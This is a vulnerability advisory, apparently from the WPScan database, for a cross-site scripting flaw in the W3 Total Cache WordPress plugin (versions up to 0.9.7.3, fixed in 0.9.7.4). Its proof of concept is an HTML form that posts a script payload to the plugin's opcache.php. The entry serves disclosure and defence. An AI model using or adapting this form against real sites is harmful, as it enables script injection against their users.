W3 Total Cache <= 0.9.7.3 - Cross-Site Scripting (XSS)



Proof of Concept
<!DOCTYPE html>
<html>
<body>
     <form action="http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php" method="POST">
         <input type="text" name="nonce" value="974ca6ad15021a6668e7ae02e1be551c">
         <input type="text" name="command" value="<script>alert(1)</script>">
         <input type="submit" name="">
     </form>
</body>
</html> 

Affects Plugin

fixed in version 0.9.7.4

References

URL https://plugins.trac.wordpress.org/changeset/2081515/w3-total-cache#file24

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Thomas Chauchefoin
Views 2928
Verified Yes
WPVDB ID 9269

Timeline

Publicly Published 2019-05-06 (14 days ago)
Added 2019-05-06 (13 days ago)
Last Updated 2019-05-07 (13 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.